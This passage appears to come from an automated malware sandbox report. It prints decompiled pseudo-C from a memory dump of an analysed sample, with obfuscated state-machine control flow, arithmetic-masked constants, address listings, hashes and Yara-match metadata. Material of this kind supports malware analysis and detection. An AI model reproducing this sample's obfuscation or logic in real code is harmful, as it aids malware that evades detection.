										E00233E3F(_t344, _t382 + 0xa4, __eflags,  *(_t382 + 0x68),  *((intOrPtr*)(_t382 + 0x70)));
										_t331 = E002228CE(_t382 + 0xac,  *(_t382 + 0x50),  *(_t382 + 0x80));
										_t382 = _t382 + 0xc;
										_t376 = 0x7fec1df;
										_t344 = 0;
										 *_t331 = 0;
										continue;
									} else {
										if(_t376 == 0x2c9ad714) {
											E00234F7D( *(_t382 + 0x60),  *(_t382 + 0x38), _t337);
										} else {
											if(_t376 != 0x33ecfade) {
												goto L16;
											} else {
												_t263 = _t380 + 4; // 0xedb0bf04
												E00236CAA( *(_t382 + 0x4c),  *((intOrPtr*)(_t382 + 0xa0)), _t337, _t263,  *(_t382 + 0x64),  *_t380,  *(_t382 + 0x20), _t344,  *_t263,  *(_t382 + 0x94));
												_t382 = _t382 + 0x20;
												_t344 = 1;
												_t376 = 0x2c9ad714;
												_t373 =  !=  ? 1 : _t373;
												continue;
											}
										}
									}
								}
							}
						}
						L19:
						return _t373;
					}
					_t325 = E0022B566(_t344, 0,  *((intOrPtr*)(_t382 + 0xb8)),  *(_t382 + 0x58),  *((intOrPtr*)(_t382 + 0xa8)),  *(_t382 + 0x48), _t344,  *((intOrPtr*)(_t382 + 0x70)),  *(_t382 + 0x90),  *((intOrPtr*)(_t382 + 0x84)),  *(_t382 + 0x2c),  *(_t382 + 0x74),  *(_t382 + 0x1c),  *((intOrPtr*)(_t382 + 0x4b8)));
					_t337 = _t325;
					_t382 = _t382 + 0x30;
					__eflags = _t325 - 0xffffffff;
					if(__eflags == 0) {
						_t376 = 0x18af80d5;
						goto L16;
					} else {
						_t376 = 0x33ecfade;
						continue;
					}
					goto L19;
					L16:
					__eflags = _t376 - 0x18af80d5;
				} while (__eflags != 0);
				goto L19;
			}













                                              0x002288eb
                                              0x002288f3
                                              0x002288fb
                                              0x00228900
                                              0x00228905
                                              0x0022890d
                                              0x00228915
                                              0x0022891d
                                              0x00228925
                                              0x00228935
                                              0x00228937
                                              0x00228942
                                              0x00228944
                                              0x00228949
                                              0x00228952
                                              0x0022895d
                                              0x00228962
                                              0x0022896a
                                              0x00228972
                                              0x0022897a
                                              0x00228982
                                              0x00228987
                                              0x0022898f
                                              0x0022899c
                                              0x0022899f
                                              0x002289a3
                                              0x002289ab
                                              0x002289b3
                                              0x002289bb
                                              0x002289c3
                                              0x002289cb
                                              0x002289d3
                                              0x002289e3
                                              0x002289e7
                                              0x002289ef
                                              0x002289f7
                                              0x002289ff
                                              0x00228a07
                                              0x00228a0f
                                              0x00228a14
                                              0x00228a1c
                                              0x00228a24
                                              0x00228a2c
                                              0x00228a34
                                              0x00228a3c
                                              0x00228a41
                                              0x00228a46
                                              0x00228a4e
                                              0x00228a5b
                                              0x00228a5c
                                              0x00228a66
                                              0x00228a6a
                                              0x00228a72
                                              0x00228a7a
                                              0x00228a7f
                                              0x00228a84
                                              0x00228a8c
                                              0x00228a94
                                              0x00228a9c
                                              0x00228aa4
                                              0x00228aac
                                              0x00228ab4
                                              0x00228abc
                                              0x00228ac1
                                              0x00228acb
                                              0x00228ad3
                                              0x00228ae8
                                              0x00228ae9
                                              0x00228af0
                                              0x00228afb
                                              0x00228b08
                                              0x00228b0c
                                              0x00228b14
                                              0x00228b1c
                                              0x00228b27
                                              0x00228b2f
                                              0x00228b3a
                                              0x00228b42
                                              0x00228b47
                                              0x00228b4f
                                              0x00228b54
                                              0x00228b5c
                                              0x00228b70
                                              0x00228b77
                                              0x00228b82
                                              0x00228b8a
                                              0x00228b92
                                              0x00228b97
                                              0x00228b9f
                                              0x00228baa
                                              0x00228bb2
                                              0x00228bbd
                                              0x00228bc5
                                              0x00228bcd
                                              0x00228bd2
                                              0x00228bd7
                                              0x00228bdf
                                              0x00228be7
                                              0x00228bf4
                                              0x00228bf8
                                              0x00228c00
                                              0x00228c08
                                              0x00228c10
                                              0x00228c15
                                              0x00228c1a
                                              0x00228c22
                                              0x00228c2a
                                              0x00228c32
                                              0x00228c3a
                                              0x00228c42
                                              0x00228c47
                                              0x00228c51
                                              0x00228c55
                                              0x00228c5d
                                              0x00228c65
                                              0x00228c6d
                                              0x00228c75
                                              0x00228c7d
                                              0x00228c85
                                              0x00228c8d
                                              0x00228c95
                                              0x00228c9d
                                              0x00228cb0
                                              0x00228cb7
                                              0x00228cc2
                                              0x00228cca
                                              0x00228ccf
                                              0x00228cd7
                                              0x00228cdf
                                              0x00228ce7
                                              0x00228cef
                                              0x00228cf4
                                              0x00228cf9
                                              0x00228d01
                                              0x00228d17
                                              0x00228d1e
                                              0x00228d21
                                              0x00228d28
                                              0x00228d33
                                              0x00228d3b
                                              0x00228d43
                                              0x00228d4b
                                              0x00228d53
                                              0x00228d5b
                                              0x00228d68
                                              0x00228d6c
                                              0x00228d71
                                              0x00228d79
                                              0x00228d79
                                              0x00228d8b
                                              0x00228ecd
                                              0x00228ee0
                                              0x00228ee5
                                              0x00228ee8
                                              0x00000000
                                              0x00228d91
                                              0x00228d97
                                              0x00228e4f
                                              0x00228ea1
                                              0x00228eb3
                                              0x00228eb7
                                              0x00228ebc
                                              0x00228ebf
                                              0x00000000
                                              0x00228d9d
                                              0x00228da3
                                              0x00228e45
                                              0x00000000
                                              0x00228da9
                                              0x00228daf
                                              0x00228e17
                                              0x00228e2e
                                              0x00228e33
                                              0x00228e36
                                              0x00228e3b
                                              0x00228e3d
                                              0x00000000
                                              0x00228db1
                                              0x00228db7
                                              0x00228f65
                                              0x00228dbd
                                              0x00228dc3
                                              0x00000000
                                              0x00228dc9
                                              0x00228dd0
                                              0x00228dee
                                              0x00228df5
                                              0x00228df8
                                              0x00228df9
                                              0x00228e00
                                              0x00000000
                                              0x00228e00
                                              0x00228dc3
                                              0x00228db7
                                              0x00228daf
                                              0x00228da3
                                              0x00228d97
                                              0x00228f6b
                                              0x00228f77
                                              0x00228f77
                                              0x00228f30
                                              0x00228f35
                                              0x00228f37
                                              0x00228f3a
                                              0x00228f3d
                                              0x00228f49
                                              0x00000000
                                              0x00228f3f
                                              0x00228f3f
                                              0x00000000
                                              0x00228f3f
                                              0x00000000
                                              0x00228f4e
                                              0x00228f4e
                                              0x00228f4e
                                              0x00000000

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandle
                                              • String ID: ,$0$2X$2\c+$2\c+$At$EZX-$Q#JK$Ui=
                                              • API String ID: 2962429428-1096774584
                                              • Opcode ID: c6f97d9852e594908297d7dc3ae08885571f18f7e498a7c9f787d4f134a9b738
                                              • Instruction ID: 990e25a2b94fe9099948742218b015bc079ccd235c86dfc2a16d034981ec9433
                                              • Opcode Fuzzy Hash: c6f97d9852e594908297d7dc3ae08885571f18f7e498a7c9f787d4f134a9b738
                                              • Instruction Fuzzy Hash: 71F11072508380AFD368CF65D48A64BFBE1BBC4758F10891DF1DA962A0C7B98959CF43
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002326F5, Relevance: 11.5, Strings: 9, Instructions: 225COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 96%
                                              			E002326F5(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				void* __edi;
				void* __ebp;
				intOrPtr _t199;
				intOrPtr _t201;
				void* _t202;
				intOrPtr _t204;
				intOrPtr _t208;
				intOrPtr _t209;
				intOrPtr* _t210;
				signed int _t212;
				signed int _t213;
				signed int _t214;
				signed int _t215;
				void* _t216;
				void* _t224;
				void* _t237;
				intOrPtr _t241;
				void* _t242;
				intOrPtr _t246;
				signed int* _t247;

				_t247 =  &_v88;
				_v12 = 0x29be25;
				_v8 = 0x714c58;
				_t241 = 0;
				_t210 = __edx;
				_v4 = 0;
				_v28 = 0x1199;
				_t246 = __ecx;
				_v28 = _v28 + 0xffffe920;
				_t242 = 0x2efb68f6;
				_v28 = _v28 ^ 0xffffad72;
				_v32 = 0x5bb2;
				_t212 = 0x22;
				_v32 = _v32 / _t212;
				_v32 = _v32 ^ 0x00002aec;
				_v56 = 0xeb34;
				_t213 = 0x1b;
				_v56 = _v56 * 0x6a;
				_v56 = _v56 + 0x2965;
				_v56 = _v56 ^ 0x0061feda;
				_v84 = 0xfe4e;
				_v84 = _v84 + 0xd2a6;
				_v84 = _v84 >> 3;
				_v84 = _v84 | 0x3d0bc2c6;
				_v84 = _v84 ^ 0x3d0bc81e;
				_v20 = 0x5db0;
				_v20 = _v20 + 0xffffd438;
				_v20 = _v20 ^ 0x00005602;
				_v24 = 0xa932;
				_v24 = _v24 * 0x1f;
				_v24 = _v24 ^ 0x00145068;
				_v88 = 0xc29f;
				_v88 = _v88 * 0x34;
				_v88 = _v88 ^ 0xcbbf1de0;
				_v88 = _v88 + 0x67bb;
				_v88 = _v88 ^ 0xcb98f8b4;
				_v36 = 0x7c84;
				_v36 = _v36 + 0x6da7;
				_v36 = _v36 ^ 0x0000df84;
				_v60 = 0xf0d8;
				_v60 = _v60 + 0xffffcb07;
				_v60 = _v60 * 0x50;
				_v60 = _v60 ^ 0x003a95e0;
				_v44 = 0x6681;
				_v44 = _v44 + 0xffff19d2;
				_v44 = _v44 / _t213;
				_v44 = _v44 ^ 0x097b3a7d;
				_v16 = 0x94d;
				_v16 = _v16 + 0x4187;
				_v16 = _v16 ^ 0x00007836;
				_v48 = 0x21e9;
				_v48 = _v48 ^ 0x3c92a0ae;
				_v48 = _v48 + 0xf596;
				_v48 = _v48 ^ 0x3c9366ad;
				_v52 = 0x4a04;
				_v52 = _v52 * 0x54;
				_v52 = _v52 ^ 0x56a39f58;
				_v52 = _v52 ^ 0x56bbe121;
				_v80 = 0x166f;
				_v80 = _v80 ^ 0x3bc38db2;
				_v80 = _v80 << 0xd;
				_v80 = _v80 | 0x5d8ccce3;
				_v80 = _v80 ^ 0x7fffd756;
				_v76 = 0xd2e;
				_t214 = 6;
				_v76 = _v76 / _t214;
				_t215 = 0x59;
				_t237 = 0xdd7d922;
				_v76 = _v76 / _t215;
				_v76 = _v76 ^ 0xb1a59fe6;
				_v76 = _v76 ^ 0xb1a5c97b;
				_v40 = 0x2ae1;
				_v40 = _v40 >> 6;
				_v40 = _v40 << 2;
				_v40 = _v40 ^ 0x0000341b;
				_v64 = 0x37cd;
				_v64 = _v64 + 0xffff3540;
				_v64 = _v64 << 1;
				_v64 = _v64 | 0x66261fef;
				_v64 = _v64 ^ 0xfffeb931;
				_v68 = 0x9ed9;
				_v68 = _v68 + 0xad09;
				_v68 = _v68 ^ 0xfd9e5c2b;
				_v68 = _v68 >> 4;
				_v68 = _v68 ^ 0x0fd99075;
				_v72 = 0x1a2d;
				_v72 = _v72 + 0xc4a4;
				_v72 = _v72 << 6;
				_v72 = _v72 * 0x59;
				_v72 = _v72 ^ 0x135ddffd;
				while(1) {
					L1:
					_t216 = 0x2c1c6573;
					while(_t242 != 0x6072d1c) {
						if(_t242 == _t237) {
							_push(_t216);
							_t199 = E00221132(_v44, _t216, _v16, _t216, _t241, _v48, _v52, _v80, E00222A30);
							_t247 =  &(_t247[9]);
							 *((intOrPtr*)(_t241 + 0x1c)) = _t199;
							__eflags = _t199;
							_t216 = 0x2c1c6573;
							_t242 =  !=  ? 0x2c1c6573 : 0x6072d1c;
							L13:
							_t237 = 0xdd7d922;
							continue;
						}
						if(_t242 == 0xe9e2879) {
							_push(_v24);
							_t201 = E00236DB9( *((intOrPtr*)(_t210 + 4)), _t241, _t246, __eflags, _t216,  *_t210, _v84, _v20);
							_t247 =  &(_t247[5]);
							 *((intOrPtr*)(_t241 + 0x28)) = _t201;
							__eflags = _t201;
							_t202 = 0x303a6ade;
							_t242 =  !=  ? 0x303a6ade : 0x28cfd81a;
							L12:
							_t216 = 0x2c1c6573;
							goto L13;
						}
						if(_t242 == 0x28cfd81a) {
							return E0022F536(_v64, _v68, _v72, _t241);
						}
						if(_t242 == _t216) {
							 *((intOrPtr*)(_t241 + 0x24)) = _t246;
							_t204 =  *0x23ca24; // 0x0
							 *((intOrPtr*)(_t241 + 0x2c)) = _t204;
							 *0x23ca24 = _t241;
							return _t204;
						}
						if(_t242 != 0x2efb68f6) {
							if(_t242 != _t202) {
								L17:
								__eflags = _t242 - 0x35b12720;
								if(__eflags != 0) {
									continue;
								} else {
									return _t202;
								}
								L22:
							} else {
								_t209 = E002276DB( *((intOrPtr*)(_t241 + 0x28)), _v88, _v36, _v60);
								_t247 =  &(_t247[2]);
								 *((intOrPtr*)(_t241 + 4)) = _t209;
								_t237 = 0xdd7d922;
								_t242 =  !=  ? 0xdd7d922 : 0x6072d1c;
								goto L1;
							}
						}
						_push(_t216);
						_push(_t216);
						_t224 = 0x38;
						_t208 = E00228736(_t224);
						_t241 = _t208;
						__eflags = _t241;
						if(__eflags != 0) {
							_t242 = 0xe9e2879;
							_t202 = 0x303a6ade;
							goto L12;
						}
						return _t208;
						goto L22;
					}
					E0023422C(_v76,  *((intOrPtr*)(_t241 + 0x28)), _v40);
					_t242 = 0x28cfd81a;
					_t216 = 0x2c1c6573;
					_t237 = 0xdd7d922;
					goto L17;
				}
			}













































                                              0x002326f5
                                              0x002326f8
                                              0x00232700
                                              0x0023270c
                                              0x0023270e
                                              0x00232710
                                              0x00232716
                                              0x0023271e
                                              0x00232720
                                              0x00232728
                                              0x0023272d
                                              0x00232735
                                              0x00232743
                                              0x00232748
                                              0x0023274e
                                              0x00232756
                                              0x00232763
                                              0x00232764
                                              0x00232768
                                              0x00232770
                                              0x00232778
                                              0x00232780
                                              0x00232788
                                              0x0023278d
                                              0x00232795
                                              0x0023279d
                                              0x002327a5
                                              0x002327ad
                                              0x002327b5
                                              0x002327c2
                                              0x002327c6
                                              0x002327ce
                                              0x002327db
                                              0x002327df
                                              0x002327e7
                                              0x002327ef
                                              0x002327f7
                                              0x002327ff
                                              0x00232807
                                              0x0023280f
                                              0x00232817
                                              0x00232824
                                              0x00232828
                                              0x00232830
                                              0x00232838
                                              0x00232846
                                              0x0023284a
                                              0x00232852
                                              0x0023285a
                                              0x00232862
                                              0x0023286a
                                              0x00232872
                                              0x0023287a
                                              0x00232882
                                              0x0023288a
                                              0x00232897
                                              0x0023289b
                                              0x002328a3
                                              0x002328ab
                                              0x002328b3
                                              0x002328bb
                                              0x002328c0
                                              0x002328c8
                                              0x002328d0
                                              0x002328e0
                                              0x002328e5
                                              0x002328ef
                                              0x002328f2
                                              0x002328f7
                                              0x002328fb
                                              0x00232903
                                              0x0023290b
                                              0x00232913
                                              0x00232918
                                              0x0023291d
                                              0x00232925
                                              0x0023292d
                                              0x00232935
                                              0x00232939
                                              0x00232941
                                              0x00232949
                                              0x00232951
                                              0x00232959
                                              0x00232961
                                              0x00232966
                                              0x0023296e
                                              0x00232976
                                              0x0023297e
                                              0x00232988
                                              0x0023298c
                                              0x00232994
                                              0x00232994
                                              0x00232999
                                              0x0023299e
                                              0x002329ac
                                              0x00232a76
                                              0x00232a93
                                              0x00232a98
                                              0x00232a9b
                                              0x00232a9e
                                              0x00232aa5
                                              0x00232aaf
                                              0x00232a3e
                                              0x00232a3e
                                              0x00000000
                                              0x00232a3e
                                              0x002329b8
                                              0x00232a48
                                              0x00232a5a
                                              0x00232a5f
                                              0x00232a62
                                              0x00232a65
                                              0x00232a6c
                                              0x00232a71
                                              0x00232a39
                                              0x00232a39
                                              0x00000000
                                              0x00232a39
                                              0x002329c4
                                              0x00000000
                                              0x00232b0d
                                              0x002329cc
                                              0x00232ae7
                                              0x00232aea
                                              0x00232aef
                                              0x00232af2
                                              0x00000000
                                              0x00232af2
                                              0x002329d8
                                              0x002329dc
                                              0x00232ad9
                                              0x00232ad9
                                              0x00232adf
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002329e2
                                              0x002329f1
                                              0x002329f6
                                              0x002329f9
                                              0x00232a03
                                              0x00232a08
                                              0x00000000
                                              0x00232a08
                                              0x002329dc
                                              0x00232a19
                                              0x00232a1a
                                              0x00232a1d
                                              0x00232a1e
                                              0x00232a23
                                              0x00232a27
                                              0x00232a29
                                              0x00232a2f
                                              0x00232a34
                                              0x00000000
                                              0x00232a34
                                              0x00232b15
                                              0x00000000
                                              0x00232b15
                                              0x00232abf
                                              0x00232ac5
                                              0x00232acf
                                              0x00232ad4
                                              0x00000000
                                              0x00232ad4

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: .$4$6x$XLq$e)$}:{$!$*$*
                                              • API String ID: 0-323616845
                                              • Opcode ID: 46a11bebf5d066b33cc2e68f885bfc987622104c7137910244a097001621dfc9
                                              • Instruction ID: 9d45987b0601f01fb8b88f3c850f81e38fdc2d759f5177c9dce1c138322b91b8
                                              • Opcode Fuzzy Hash: 46a11bebf5d066b33cc2e68f885bfc987622104c7137910244a097001621dfc9
                                              • Instruction Fuzzy Hash: CCA152B1918341DFD368CF25D88950BFBE1FB84758F108A1DF199AA260D3B5CA59CF82
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002363C1, Relevance: 11.4, Strings: 9, Instructions: 194COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E002363C1() {
				intOrPtr _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				void* _t166;
				signed int _t167;
				signed int _t168;
				void* _t173;
				void* _t191;
				intOrPtr _t196;
				signed int _t197;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				signed int _t201;
				intOrPtr _t202;
				intOrPtr* _t203;
				signed int _t204;
				signed int* _t205;

				_t205 =  &_v76;
				_v8 = 0x6b5f41;
				_t196 = 0;
				_t173 = 0x1e312b00;
				_v4 = 0;
				_v40 = 0xbf50;
				_v40 = _v40 + 0xffff4d7d;
				_v40 = _v40 ^ 0x1ff0eb0a;
				_v40 = _v40 ^ 0x1ff1e7c7;
				_v68 = 0xcba5;
				_v68 = _v68 + 0xffffed4d;
				_v68 = _v68 >> 9;
				_v68 = _v68 | 0x05a9bf19;
				_v68 = _v68 ^ 0x05a9faf6;
				_v52 = 0xab70;
				_v52 = _v52 + 0xffff3c3f;
				_v52 = _v52 ^ 0x3be47de3;
				_v52 = _v52 ^ 0xc41b8c81;
				_v20 = 0x4c56;
				_t27 =  &_v20; // 0x4c56
				_t197 = 0x53;
				_v20 =  *_t27 / _t197;
				_v20 = _v20 ^ 0x00006ba4;
				_v44 = 0x4e4f;
				_v44 = _v44 + 0xffff1389;
				_v44 = _v44 ^ 0x6e1bb2f9;
				_v44 = _v44 ^ 0x91e4a702;
				_v48 = 0x9b6d;
				_t198 = 0x15;
				_v48 = _v48 / _t198;
				_v48 = _v48 << 0xe;
				_v48 = _v48 ^ 0x01d9d03e;
				_v16 = 0x7c52;
				_t199 = 0x3a;
				_v16 = _v16 * 0x14;
				_v16 = _v16 ^ 0x0009e5e2;
				_v64 = 0x462a;
				_v64 = _v64 ^ 0x0e1a4a8f;
				_v64 = _v64 >> 3;
				_v64 = _v64 >> 0xc;
				_v64 = _v64 ^ 0x000014fb;
				_v72 = 0x5cc4;
				_v72 = _v72 / _t199;
				_v72 = _v72 + 0x2f24;
				_v72 = _v72 + 0xd2bc;
				_v72 = _v72 ^ 0x000179b4;
				_v24 = 0x30ff;
				_t200 = 0x2a;
				_v24 = _v24 / _t200;
				_v24 = _v24 ^ 0x00007cf0;
				_v28 = 0x85cd;
				_v28 = _v28 ^ 0xf8a4d4b8;
				_v28 = _v28 ^ 0xf8a43927;
				_v76 = 0x1878;
				_v76 = _v76 ^ 0x7099aca3;
				_v76 = _v76 ^ 0x4acb853d;
				_v76 = _v76 + 0xffff4ab7;
				_v76 = _v76 ^ 0x3a511503;
				_v32 = 0x1800;
				_v32 = _v32 << 1;
				_v32 = _v32 ^ 0x00002132;
				_v60 = 0xa25b;
				_v60 = _v60 * 0x67;
				_v60 = _v60 + 0x9ac4;
				_v60 = _v60 ^ 0x004180d5;
				_v36 = 0x47a4;
				_v36 = _v36 << 9;
				_v36 = _v36 ^ 0xcd228633;
				_v36 = _v36 ^ 0xcdadbf4b;
				_v12 = 0xe30d;
				_v12 = _v12 << 8;
				_v12 = _v12 ^ 0x00e3661f;
				_t172 = _v12;
				_t204 = _v12;
				_t201 = _v12;
				_v56 = 0x2740;
				_v56 = _v56 ^ 0x239771de;
				_v56 = _v56 + 0xfffffe7e;
				_v56 = _v56 ^ 0x23985523;
				while(1) {
					L1:
					_t191 = 0x5c;
					while(1) {
						L2:
						do {
							L3:
							while(_t173 != 0x3fc1d7) {
								if(_t173 == 0x353ab5a) {
									_t202 =  *0x23ca2c; // 0x4d8300
									_t203 = _t202 + 0x230;
									while( *_t203 != _t191) {
										_t203 = _t203 + 2;
									}
									_t201 = _t203 + 2;
									_t173 = 0x6fcf9e2;
									goto L2;
								} else {
									if(_t173 == 0x6adc8a5) {
										_t167 = E0022F65F(_v40, _v44, _v48, _v16, _t201, _t172, _v64);
										_t205 =  &(_t205[5]);
										_t204 = _t167;
										_t166 = 0xd265085;
										_t173 =  !=  ? 0xd265085 : 0x3fc1d7;
										_t191 = 0x5c;
										continue;
									} else {
										if(_t173 == 0x6fcf9e2) {
											_t168 = E00222959(_t173, _v68, _v52, _v20, _v56);
											_t172 = _t168;
											_t205 =  &(_t205[4]);
											if(_t168 != 0) {
												_t173 = 0x6adc8a5;
												goto L1;
											}
										} else {
											if(_t173 == _t166) {
												E0023507B(_v72, _v24, _v28, _v76, _t204);
												_t205 =  &(_t205[3]);
												_t196 =  !=  ? 1 : _t196;
												_t173 = 0x17a504e8;
												while(1) {
													L1:
													_t191 = 0x5c;
													goto L2;
												}
											} else {
												if(_t173 == 0x17a504e8) {
													E00225FB2(_v32, _v60, _t204);
													_t173 = 0x3fc1d7;
													while(1) {
														L1:
														_t191 = 0x5c;
														L2:
														goto L3;
													}
												} else {
													if(_t173 != 0x1e312b00) {
														goto L21;
													} else {
														_t173 = 0x353ab5a;
														continue;
													}
												}
											}
										}
									}
								}
								goto L22;
							}
							E00225FB2(_v36, _v12, _t172);
							_t173 = 0x26181ebc;
							_t166 = 0xd265085;
							_t191 = 0x5c;
							L21:
						} while (_t173 != 0x26181ebc);
						L22:
						return _t196;
					}
				}
			}





































                                              0x002363c1
                                              0x002363c4
                                              0x002363d2
                                              0x002363d4
                                              0x002363d9
                                              0x002363dd
                                              0x002363e5
                                              0x002363ed
                                              0x002363f5
                                              0x002363fd
                                              0x00236405
                                              0x0023640d
                                              0x00236412
                                              0x0023641a
                                              0x00236422
                                              0x0023642a
                                              0x00236432
                                              0x0023643a
                                              0x00236442
                                              0x0023644a
                                              0x00236450
                                              0x00236455
                                              0x0023645b
                                              0x00236463
                                              0x0023646b
                                              0x00236473
                                              0x0023647b
                                              0x00236483
                                              0x0023648f
                                              0x00236494
                                              0x0023649a
                                              0x0023649f
                                              0x002364a7
                                              0x002364b4
                                              0x002364b7
                                              0x002364bb
                                              0x002364c3
                                              0x002364cb
                                              0x002364d3
                                              0x002364d8
                                              0x002364dd
                                              0x002364e5
                                              0x002364f5
                                              0x002364f9
                                              0x00236501
                                              0x00236509
                                              0x00236511
                                              0x0023651d
                                              0x00236520
                                              0x00236524
                                              0x0023652c
                                              0x00236534
                                              0x0023653c
                                              0x00236544
                                              0x0023654c
                                              0x00236554
                                              0x0023655c
                                              0x00236564
                                              0x0023656c
                                              0x00236574
                                              0x00236578
                                              0x00236580
                                              0x0023658d
                                              0x00236591
                                              0x00236599
                                              0x002365a1
                                              0x002365a9
                                              0x002365ae
                                              0x002365b6
                                              0x002365be
                                              0x002365c6
                                              0x002365cb
                                              0x002365d3
                                              0x002365d7
                                              0x002365db
                                              0x002365df
                                              0x002365e7
                                              0x002365ef
                                              0x002365f7
                                              0x002365ff
                                              0x002365ff
                                              0x00236601
                                              0x00236602
                                              0x00236602
                                              0x00236607
                                              0x00000000
                                              0x00236607
                                              0x00236619
                                              0x002366f6
                                              0x002366fc
                                              0x00236707
                                              0x00236704
                                              0x00236704
                                              0x0023670c
                                              0x0023670f
                                              0x00000000
                                              0x0023661f
                                              0x00236625
                                              0x002366d5
                                              0x002366da
                                              0x002366dd
                                              0x002366e6
                                              0x002366eb
                                              0x002366f0
                                              0x00000000
                                              0x0023662b
                                              0x00236631
                                              0x002366a3
                                              0x002366a8
                                              0x002366aa
                                              0x002366af
                                              0x002366b5
                                              0x00000000
                                              0x002366b5
                                              0x00236633
                                              0x00236635
                                              0x00236679
                                              0x00236680
                                              0x00236686
                                              0x00236689
                                              0x002365ff
                                              0x002365ff
                                              0x00236601
                                              0x00000000
                                              0x00236601
                                              0x00236637
                                              0x0023663d
                                              0x0023665b
                                              0x00236661
                                              0x002365ff
                                              0x002365ff
                                              0x00236601
                                              0x00236602
                                              0x00000000
                                              0x00236602
                                              0x0023663f
                                              0x00236645
                                              0x00000000
                                              0x0023664b
                                              0x0023664b
                                              0x00000000
                                              0x0023664b
                                              0x00236645
                                              0x0023663d
                                              0x00236635
                                              0x00236631
                                              0x00236625
                                              0x00000000
                                              0x00236619
                                              0x00236722
                                              0x0023672a
                                              0x0023672f
                                              0x00236734
                                              0x00236735
                                              0x00236735
                                              0x00236741
                                              0x0023674a
                                              0x0023674a
                                              0x00236602

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: $/$*F$2!$@'$A_k$ON$R|$VLA_k$};
                                              • API String ID: 0-175875280
                                              • Opcode ID: a92a726d8a74cd5cba0f208e5eb44e929de75e5fdfdff0b642b2397bf8ce9080
                                              • Instruction ID: 903ed4379af4905ed60686a31a040a493c1a3705d5d88ccc40404fce79c10416
                                              • Opcode Fuzzy Hash: a92a726d8a74cd5cba0f208e5eb44e929de75e5fdfdff0b642b2397bf8ce9080
                                              • Instruction Fuzzy Hash: B08146B1118381AFD758CF24C49A81BBBF5FBC4358F504A1DF686566A0C7B58958CB82
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00232349, Relevance: 11.4, Strings: 9, Instructions: 190COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 92%
                                              			E00232349(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16) {
				char _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t153;
				void* _t168;
				signed int _t172;
				char _t177;
				signed int _t178;
				void* _t181;
				char* _t186;
				signed int _t206;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				signed int* _t214;

				_push(_a16);
				_push(0x40);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0022602B(_t153);
				_v20 = 0x10;
				_t214 =  &(( &_v80)[6]);
				_v60 = 0xafa2;
				_v60 = _v60 ^ 0xad7cd4b0;
				_t178 = 0;
				_v60 = _v60 | 0x7a339cd1;
				_t181 = 0x15b39dc0;
				_v60 = _v60 ^ 0xff7ff485;
				_v64 = 0xe220;
				_v64 = _v64 >> 2;
				_v64 = _v64 | 0x618d1066;
				_v64 = _v64 ^ 0x618d4123;
				_v28 = 0xfe94;
				_t206 = 0x17;
				_v28 = _v28 / _t206;
				_v28 = _v28 ^ 0x000043c3;
				_v32 = 0x6fe3;
				_v32 = _v32 >> 1;
				_v32 = _v32 ^ 0x000078b7;
				_v36 = 0x3688;
				_t207 = 0x69;
				_v36 = _v36 * 0x5a;
				_v36 = _v36 ^ 0x00137d17;
				_v24 = 0x8157;
				_v24 = _v24 | 0x6dbfc3a0;
				_v24 = _v24 ^ 0x6dbfb45a;
				_v80 = 0xe945;
				_v80 = _v80 / _t207;
				_v80 = _v80 ^ 0xcc46d226;
				_t208 = 0x62;
				_v80 = _v80 / _t208;
				_v80 = _v80 ^ 0x0215c355;
				_v48 = 0x42ef;
				_v48 = _v48 + 0xffff3840;
				_v48 = _v48 << 4;
				_v48 = _v48 ^ 0xfff789fd;
				_v72 = 0xbf2b;
				_v72 = _v72 | 0xc326a1c7;
				_t209 = 0x4b;
				_v72 = _v72 / _t209;
